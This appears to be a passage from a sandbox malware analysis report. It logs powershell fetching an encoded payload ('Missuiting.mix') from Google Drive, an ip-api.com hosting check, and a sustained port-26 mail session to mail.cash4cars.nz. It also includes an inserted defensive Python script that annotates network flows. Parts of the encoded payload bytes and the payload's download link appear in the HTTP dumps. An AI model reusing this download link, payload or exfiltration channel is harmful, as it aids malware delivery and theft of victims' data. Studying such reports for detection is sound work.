                                                                      Apr 18, 2024 10:11:50.577410936 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:50.577749968 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:50.880078077 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:50.882688046 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:51.199997902 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:51.200062037 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:51.200126886 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:51.200159073 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:51.217938900 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:51.518431902 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:51.537666082 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:51.837871075 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:51.839489937 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:52.140182018 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:52.140902996 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:52.454384089 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:52.454710960 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:52.754985094 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:52.755297899 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.055692911 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.055948019 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.356408119 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.357220888 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.357258081 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.357361078 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.357383966 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:11:53.658437967 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.658490896 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.658524036 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.658559084 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.664000034 CEST2649713114.142.162.17192.168.2.6
                                                                      Apr 18, 2024 10:11:53.718936920 CEST4971326192.168.2.6114.142.162.17
                                                                      Apr 18, 2024 10:12:20.479226112 CEST8049712208.95.112.1192.168.2.6
                                                                      Apr 18, 2024 10:12:20.479301929 CEST4971280192.168.2.6208.95.112.1
                                                                      Apr 18, 2024 10:12:38.516314983 CEST4971280192.168.2.6208.95.112.1
                                                                      Apr 18, 2024 10:12:38.633383989 CEST8049712208.95.112.1192.168.2.6
Timestamp                             Src Port  Dst Port  Source IP        Dest IP
Apr 18, 2024 10:10:57.517328978 CEST  62945     53        192.168.2.6      1.1.1.1
Apr 18, 2024 10:10:57.621870041 CEST  53        62945     1.1.1.1          192.168.2.6
Apr 18, 2024 10:10:58.096810102 CEST  61700     53        192.168.2.6      1.1.1.1
Apr 18, 2024 10:10:58.202159882 CEST  53        61700     1.1.1.1          192.168.2.6
Apr 18, 2024 10:11:46.690378904 CEST  49653     53        192.168.2.6      1.1.1.1
Apr 18, 2024 10:11:46.794575930 CEST  53        49653     1.1.1.1          192.168.2.6
Apr 18, 2024 10:11:48.514574051 CEST  51691     53        192.168.2.6      1.1.1.1
Apr 18, 2024 10:11:49.105072975 CEST  53        51691     1.1.1.1          192.168.2.6
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class        DNS over HTTPS
Apr 18, 2024 10:10:57.517328978 CEST  192.168.2.6  1.1.1.1  0x6618    Standard query (0)  drive.google.com              A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:10:58.096810102 CEST  192.168.2.6  1.1.1.1  0xa9e6    Standard query (0)  drive.usercontent.google.com  A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:11:46.690378904 CEST  192.168.2.6  1.1.1.1  0xd035    Standard query (0)  ip-api.com                    A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:11:48.514574051 CEST  192.168.2.6  1.1.1.1  0x3edd    Standard query (0)  mail.cash4cars.nz             A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                          CName  Address         Type            Class        DNS over HTTPS
Apr 18, 2024 10:10:57.621870041 CEST  1.1.1.1    192.168.2.6  0x6618    No error (0)  drive.google.com              -      64.233.185.138  A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:10:57.621870041 CEST  1.1.1.1    192.168.2.6  0x6618    No error (0)  drive.google.com              -      64.233.185.101  A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:10:57.621870041 CEST  1.1.1.1    192.168.2.6  0x6618    No error (0)  drive.google.com              -      64.233.185.139  A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:10:57.621870041 CEST  1.1.1.1    192.168.2.6  0x6618    No error (0)  drive.google.com              -      64.233.185.102  A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:10:57.621870041 CEST  1.1.1.1    192.168.2.6  0x6618    No error (0)  drive.google.com              -      64.233.185.100  A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:10:57.621870041 CEST  1.1.1.1    192.168.2.6  0x6618    No error (0)  drive.google.com              -      64.233.185.113  A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:10:58.202159882 CEST  1.1.1.1    192.168.2.6  0xa9e6    No error (0)  drive.usercontent.google.com  -      74.125.138.132  A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:11:46.794575930 CEST  1.1.1.1    192.168.2.6  0xd035    No error (0)  ip-api.com                    -      208.95.112.1    A (IP address)  IN (0x0001)  false
Apr 18, 2024 10:11:49.105072975 CEST  1.1.1.1    192.168.2.6  0x3edd    No error (0)  mail.cash4cars.nz             -      114.142.162.17  A (IP address)  IN (0x0001)  false
                                                                      • drive.google.com
                                                                      • drive.usercontent.google.com
                                                                      • ip-api.com
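The packet and DNS tables above are raw rows; what an analyst wants from them is one line per flow, with the destination IP joined back to the name the sample resolved for it and a flag on anything outside well-known service ports (here the connection to 114.142.162.17:26, which the DNS answers tie to mail.cash4cars.nz and which the report's "traffic on non-standard ports" signature refers to). The following is an added example, not code from the Joe Sandbox report or from the sample; its packet tuples and DNS pairs are constructed from a subset of the rows above, and STANDARD_PORTS is an assumed allow-list you would tune to your own environment.

```python
from collections import defaultdict

SANDBOX_IP = "192.168.2.6"  # the analysis VM in this report

# Assumed allow-list of well-known service ports; anything else is flagged.
STANDARD_PORTS = {25: "smtp", 53: "dns", 80: "http", 443: "https", 465: "smtps", 587: "submission"}

# Constructed from a subset of the TCP/UDP rows above:
# (timestamp, source port, dest port, source IP, dest IP)
PACKETS = [
    ("10:10:57.517328978", 62945, 53, SANDBOX_IP, "1.1.1.1"),
    ("10:11:45.811769009", 443, 49711, "74.125.138.132", SANDBOX_IP),
    ("10:11:45.811851978", 49711, 443, SANDBOX_IP, "74.125.138.132"),
    ("10:11:46.805531979", 49712, 80, SANDBOX_IP, "208.95.112.1"),
    ("10:11:46.922662020", 80, 49712, "208.95.112.1", SANDBOX_IP),
    ("10:11:49.105830908", 49713, 26, SANDBOX_IP, "114.142.162.17"),
    ("10:11:49.406330109", 26, 49713, "114.142.162.17", SANDBOX_IP),
    ("10:11:53.357220888", 49713, 26, SANDBOX_IP, "114.142.162.17"),
]

# (name, address) pairs taken from the DNS answers table above
DNS_ANSWERS = [
    ("drive.google.com", "64.233.185.138"),
    ("drive.usercontent.google.com", "74.125.138.132"),
    ("ip-api.com", "208.95.112.1"),
    ("mail.cash4cars.nz", "114.142.162.17"),
]


def build_flows(packets, client_ip=SANDBOX_IP):
    """Group packets into flows keyed by (client port, server IP, server port).

    Direction is decided by which side is the analysis VM, so a server->client
    packet lands in the same flow as the client->server packets it answers.
    """
    flows = defaultdict(lambda: {"out": 0, "in": 0, "first": None, "last": None})
    for ts, sport, dport, sip, dip in packets:
        if sip == client_ip:
            key, direction = (sport, dip, dport), "out"
        elif dip == client_ip:
            key, direction = (dport, sip, sport), "in"
        else:
            continue  # neither end is the VM: not our traffic
        f = flows[key]
        f[direction] += 1
        f["first"] = ts if f["first"] is None else min(f["first"], ts)
        f["last"] = ts if f["last"] is None else max(f["last"], ts)
    return dict(flows)


def annotate(flows, dns_answers):
    """Return flows in first-seen order with the resolved name and a service label."""
    ip_to_name = {addr: name for name, addr in dns_answers}
    rows = []
    for (cport, sip, sport), f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        rows.append({
            "client_port": cport,
            "server": sip,
            "server_port": sport,
            "name": ip_to_name.get(sip),  # None if the sample never resolved this IP
            "service": STANDARD_PORTS.get(sport, "non-standard"),
            "packets_out": f["out"],
            "packets_in": f["in"],
            "first": f["first"],
            "last": f["last"],
        })
    return rows


def suspicious_flows(rows):
    """Flows worth a second look: non-standard server port, or a mail host on any port."""
    return [r for r in rows
            if r["service"] == "non-standard" or (r["name"] or "").startswith("mail.")]


if __name__ == "__main__":
    rows = annotate(build_flows(PACKETS), DNS_ANSWERS)
    for r in rows:
        print(r)
    print("suspicious:", [(r["name"], r["server"], r["server_port"]) for r in suspicious_flows(rows)])
```

The flow key deliberately uses the client's ephemeral port, so the DNS flow, the two Drive connections, the ip-api.com request and the port-26 session each collapse to one row; the direction counts make it obvious that the port-26 session is a sustained two-way exchange rather than a single probe.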
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49712        208.95.112.1    80                7068  C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 18, 2024 10:11:46.923084974 CEST  80                 OUT        GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Apr 18, 2024 10:11:47.041090965 CEST  174                IN         HTTP/1.1 200 OK
                                                                      Date: Thu, 18 Apr 2024 08:11:46 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 5
                                                                      Access-Control-Allow-Origin: *
                                                                      X-Ttl: 60
                                                                      X-Rl: 44
                                                                      Data Raw: 74 72 75 65 0a
                                                                      Data Ascii: true


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49700        64.233.185.138  443               5672  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-18 08:10:57 UTC  215                OUT        GET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Host: drive.google.com
                                                                      Connection: Keep-Alive
2024-04-18 08:10:58 UTC  1582               IN         HTTP/1.1 303 See Other
                                                                      Content-Type: application/binary
                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                      Date: Thu, 18 Apr 2024 08:10:58 GMT
                                                                      Location: https://drive.usercontent.google.com/download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                      Content-Security-Policy: script-src 'nonce--I-mHTVpr_kf3ASyM7aJGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                      Server: ESF
                                                                      Content-Length: 0
                                                                      X-XSS-Protection: 0
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      X-Content-Type-Options: nosniff
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.6  49701        74.125.138.132  443               5672  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp                Bytes transferred  Direction  Data
2024-04-18 08:10:58 UTC  233                OUT        GET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Host: drive.usercontent.google.com
                                                                      Connection: Keep-Alive
2024-04-18 08:10:59 UTC  4753               IN         HTTP/1.1 200 OK
                                                                      Content-Type: application/octet-stream
                                                                      Content-Security-Policy: sandbox
                                                                      Content-Security-Policy: default-src 'none'
                                                                      Content-Security-Policy: frame-ancestors 'none'
                                                                      X-Content-Security-Policy: sandbox
                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                      Cross-Origin-Resource-Policy: same-site
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Disposition: attachment; filename="Missuiting.mix"
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Credentials: false
                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-user-App-ID-Token, X-Earth-user-Computation-Profile, X-Earth-user-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 456672
                                                                      Last-Modified: Thu, 18 Apr 2024 03:07:58 GMT
                                                                      X-GUploader-UploadID: ABPtcPrJ1CDEe7oGf2hkKZqYmEN_nupoRH0Lktd6Azke7BH0aftzRb3DRxUk6ahN2o5EvuJ6jkfynaw2IA
                                                                      Date: Thu, 18 Apr 2024 08:10:58 GMT
                                                                      Expires: Thu, 18 Apr 2024 08:10:58 GMT
                                                                      Cache-Control: private, max-age=0
                                                                      X-Goog-Hash: crc32c=VvL4Xw==
                                                                      Server: UploadServer
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close
2024-04-18 08:10:59 UTC  4753               IN         Data Raw: 36 77 49 42 47 48 45 42 6d 37 75 50 48 42 34 41 36 77 4c 45 6c 2b 73 43 38 42 49 44 58 43 51 45 63 51 47 62 63 51 47 62 75 65 56 48 78 6e 64 78 41 5a 76 72 41 6a 39 77 67 66 48 4e 77 63 6b 4c 63 51 47 62 36 77 49 51 39 59 48 78 4b 49 59 50 66 4f 73 43 71 48 68 78 41 5a 76 72 41 72 2f 56 63 51 47 62 75 74 71 6c 37 4d 37 72 41 6d 66 59 36 77 4c 30 4e 65 73 43 65 39 4e 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 38 6d 2b 4a 46 41 74 78 41 5a 76 72 41 75 57 79 30 65 4a 78 41 5a 76 72 41 71 54 4f 67 38 45 45 36 77 49 47 67 65 73 43 42 79 71 42 2b 54 47 57 61 41 52 38 79 6e 45 42 6d 2b 73 43 6c 75 43 4c 52 43 51 45 36 77 4a 45 64 75 73 43 45 79 69 4a 77 33 45 42 6d 2b 73 43 68 4b 32 42 77 34 77 71 53 77 50 72 41 76 2b 45 63 51 47 62 75 76 32 69 46 4a 6c 78 41 5a 74
                                                                      Data Ascii: 6wIBGHEBm7uPHB4A6wLEl+sC8BIDXCQEcQGbcQGbueVHxndxAZvrAj9wgfHNwckLcQGb6wIQ9YHxKIYPfOsCqHhxAZvrAr/VcQGbutql7M7rAmfY6wL0NesCe9NxAZsxynEBm+sC8m+JFAtxAZvrAuWy0eJxAZvrAqTOg8EE6wIGgesCByqB+TGWaAR8ynEBm+sCluCLRCQE6wJEdusCEyiJw3EBm+sChK2Bw4wqSwPrAv+EcQGbuv2iFJlxAZt
2024-04-18 08:10:59 UTC  4753               IN         Data Raw: 73 4b 58 52 67 7a 70 53 77 64 57 66 52 73 48 69 59 41 43 44 4b 67 78 69 6f 51 6d 75 49 61 4c 52 58 7a 56 4f 52 49 42 6f 62 4a 4a 2b 67 32 39 78 46 69 5a 51 35 2f 4e 44 2b 52 74 47 49 2b 6e 79 6e 35 51 76 48 65 67 76 69 57 55 77 62 33 67 66 74 59 6c 31 2f 36 5a 78 4f 59 41 35 61 2f 67 6c 6f 6f 30 67 73 59 42 6f 64 57 53 59 53 62 39 54 62 51 33 76 4d 51 42 62 61 51 6b 36 61 34 7a 4e 53 48 6f 48 54 61 77 52 4c 56 6e 51 4e 74 31 6d 4c 41 66 6a 37 6f 77 76 44 77 79 65 57 70 45 56 49 42 58 6e 34 5a 39 6d 58 45 38 78 4f 55 42 42 66 6c 74 65 7a 42 55 76 68 71 31 52 47 65 4e 34 7a 77 32 59 31 6e 62 77 4c 34 58 74 68 7a 70 50 79 69 53 62 76 49 58 47 55 34 33 51 6f 37 2b 58 2f 74 73 74 6f 70 62 58 45 61 31 67 45 2f 37 4d 37 55 55 36 77 68 33 45 47 31 67 77 67 43 70
                                                                      Data Ascii: sKXRgzpSwdWfRsHiYACDKgxioQmuIaLRXzVORIBobJJ+g29xFiZQ5/ND+RtGI+nyn5QvHegviWUwb3gftYl1/6ZxOYA5a/gloo0gsYBodWSYSb9TbQ3vMQBbaQk6a4zNSHoHTawRLVnQNt1mLAfj7owvDwyeWpEVIBXn4Z9mXE8xOUBBfltezBUvhq1RGeN4zw2Y1nbwL4XthzpPyiSbvIXGU43Qo7+X/tstopbXEa1gE/7M7UU6wh3EG1gwgCp
                                                                      2024-04-18 08:10:59 UTC440INData Raw: 6d 4d 30 4b 75 63 78 71 71 57 75 7a 53 75 56 30 55 67 54 37 47 38 4e 6a 70 46 38 77 7a 52 57 6e 38 67 54 2b 33 72 4f 77 42 4e 4d 31 32 42 4f 64 37 4b 4a 33 6a 49 6d 76 76 70 43 4d 61 31 57 4b 55 7a 44 74 38 6d 2b 7a 61 44 42 66 49 47 64 49 4a 33 2f 30 58 71 45 2f 4e 51 54 53 42 4f 69 6d 7a 38 59 45 58 79 41 77 2b 56 59 69 42 4f 64 39 4c 76 39 55 30 53 77 49 6a 55 56 74 5a 6d 76 44 6a 48 79 44 4b 50 63 4f 4f 54 68 4d 55 39 36 59 31 2b 30 36 35 47 68 31 37 4c 31 49 6d 71 6f 6b 46 66 53 46 52 61 4b 44 69 6f 41 4b 47 39 43 47 48 50 2b 72 32 4f 54 34 63 42 58 49 65 47 6e 67 6c 67 6d 30 70 6e 67 51 57 68 42 75 55 42 54 6d 46 58 72 46 6a 4e 36 6d 33 59 4f 39 39 2f 53 68 35 6d 73 66 58 75 6c 71 38 71 75 6c 35 39 53 75 55 46 31 54 59 5a 50 66 44 5a 32 31 36 62 4d
                                                                      Data Ascii: mM0KucxqqWuzSuV0UgT7G8NjpF8wzRWn8gT+3rOwBNM12BOd7KJ3jImvvpCMa1WKUzDt8m+zaDBfIGdIJ3/0XqE/NQTSBOimz8YEXyAw+VYiBOd9Lv9U0SwIjUVtZmvDjHyDKPcOOThMU96Y1+065Gh17L1ImqokFfSFRaKDioAKG9CGHP+r2OT4cBXIeGnglgm0pngQWhBuUBTmFXrFjN6m3YO99/Sh5msfXulq8qul59SuUF1TYZPfDZ216bM
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 54 58 56 31 77 4b 78 61 6d 6c 57 71 6d 6b 5a 43 33 4f 63 6d 39 62 37 6c 55 6a 48 61 49 4a 44 33 59 34 71 67 53 74 33 7a 2f 41 49 72 71 30 32 73 74 33 76 2f 71 79 78 66 4f 64 76 63 51 42 6f 62 33 45 41 61 47 39 78 41 47 68 76 63 51 42 4e 53 4d 49 76 6a 63 36 61 70 2f 34 54 4c 2f 76 7a 71 66 56 72 46 4e 54 46 6b 32 2b 58 65 50 65 36 79 53 75 72 68 6b 46 54 62 52 75 76 4d 51 42 48 77 7a 35 74 31 63 38 4d 74 69 6a 67 4b 2b 41 56 32 6b 37 36 6d 49 38 4d 71 46 68 33 5a 70 58 48 77 47 59 74 74 6f 38 4b 74 47 48 50 36 75 41 5a 36 6b 50 79 31 4c 74 57 49 68 42 74 50 53 63 78 7a 67 65 64 71 57 71 6a 56 74 46 51 69 6e 66 46 52 67 6b 2f 62 69 75 6c 74 78 32 59 6c 4b 37 67 70 30 35 77 72 4b 41 2b 68 6f 67 58 76 4f 53 68 4e 2b 36 69 33 56 56 49 42 64 53 34 4e 72 6e 6f
                                                                      Data Ascii: TXV1wKxamlWqmkZC3Ocm9b7lUjHaIJD3Y4qgSt3z/AIrq02st3v/qyxfOdvcQBob3EAaG9xAGhvcQBNSMIvjc6ap/4TL/vzqfVrFNTFk2+XePe6ySurhkFTbRuvMQBHwz5t1c8MtijgK+AV2k76mI8MqFh3ZpXHwGYtto8KtGHP6uAZ6kPy1LtWIhBtPScxzgedqWqjVtFQinfFRgk/biultx2YlK7gp05wrKA+hogXvOShN+6i3VVIBdS4Nrno
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 36 61 70 31 6f 31 34 38 54 7a 64 34 68 53 6d 50 4f 63 48 6a 44 78 74 71 4e 41 75 4f 4c 4a 78 79 66 63 76 41 70 66 52 58 67 6c 79 71 57 49 74 2f 37 42 64 70 78 77 71 4a 79 50 31 52 4e 72 6b 4a 57 65 77 77 44 79 55 52 71 74 74 37 69 72 36 79 46 63 66 68 35 2f 75 73 7a 77 79 65 37 6e 68 58 49 42 50 6b 43 36 68 45 54 77 79 57 4b 58 71 52 59 42 58 39 35 68 45 2b 75 35 59 69 45 4b 38 39 35 77 6c 66 62 4d 4d 47 58 37 79 74 73 62 48 41 47 4e 41 58 48 6b 65 66 70 48 59 7a 49 34 4f 42 78 76 48 4f 41 64 61 6d 55 69 61 69 43 54 4e 78 51 47 68 37 58 7a 65 70 66 67 79 4e 48 30 63 64 6f 47 55 76 6d 44 32 31 2b 78 59 69 45 43 38 78 5a 7a 48 68 42 4a 32 76 73 66 72 54 73 73 66 35 6b 54 67 76 4d 56 79 36 71 68 45 44 55 7a 45 56 57 71 62 4d 41 50 4f 52 76 56 2f 37 56 6b 64
                                                                      Data Ascii: 6ap1o148Tzd4hSmPOcHjDxtqNAuOLJxyfcvApfRXglyqWIt/7BdpxwqJyP1RNrkJWewwDyURqtt7ir6yFcfh5/uszwye7nhXIBPkC6hETwyWKXqRYBX95hE+u5YiEK895wlfbMMGX7ytsbHAGNAXHkefpHYzI4OBxvHOAdamUiaiCTNxQGh7XzepfgyNH0cdoGUvmD21+xYiEC8xZzHhBJ2vsfrTssf5kTgvMVy6qhEDUzEVWqbMAPORvV/7Vkd
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 6f 62 33 45 41 61 47 39 53 65 6f 54 54 55 62 4b 72 78 69 33 33 54 6d 71 46 63 48 59 47 48 55 65 4d 47 62 58 69 75 79 6c 66 71 76 76 39 77 48 70 7a 74 58 41 41 53 67 34 2b 41 43 68 76 5a 53 35 65 44 65 61 33 49 7a 63 63 48 4e 47 69 47 65 32 65 54 44 70 36 6b 69 50 76 49 69 5a 35 6c 4d 39 6f 2f 38 41 44 49 33 78 45 43 76 49 62 77 48 4b 58 30 46 39 59 75 38 5a 71 66 64 61 62 78 42 5a 72 72 77 4e 4e 61 47 39 78 41 47 68 76 63 51 42 6f 62 33 45 41 61 47 39 78 49 56 38 30 59 48 54 47 4a 61 52 79 77 75 58 6a 77 6a 77 4e 6f 6b 64 47 7a 56 62 4a 30 2f 73 66 51 45 76 6a 63 47 41 55 50 5a 67 6e 33 30 38 42 62 52 33 37 4f 4a 57 50 54 51 6a 41 4b 34 67 51 4d 50 53 71 38 79 44 4a 33 6d 30 76 4e 70 35 61 72 71 59 37 4a 77 32 42 75 66 39 76 70 79 6f 34 72 79 53 62 30 44
                                                                      Data Ascii: ob3EAaG9SeoTTUbKrxi33TmqFcHYGHUeMGbXiuylfqvv9wHpztXAASg4+AChvZS5eDea3IzccHNGiGe2eTDp6kiPvIiZ5lM9o/8ADI3xECvIbwHKX0F9Yu8ZqfdabxBZrrwNNaG9xAGhvcQBob3EAaG9xIV80YHTGJaRywuXjwjwNokdGzVbJ0/sfQEvjcGAUPZgn308BbR37OJWPTQjAK4gQMPSq8yDJ3m0vNp5arqY7Jw2Buf9vpyo4rySb0D
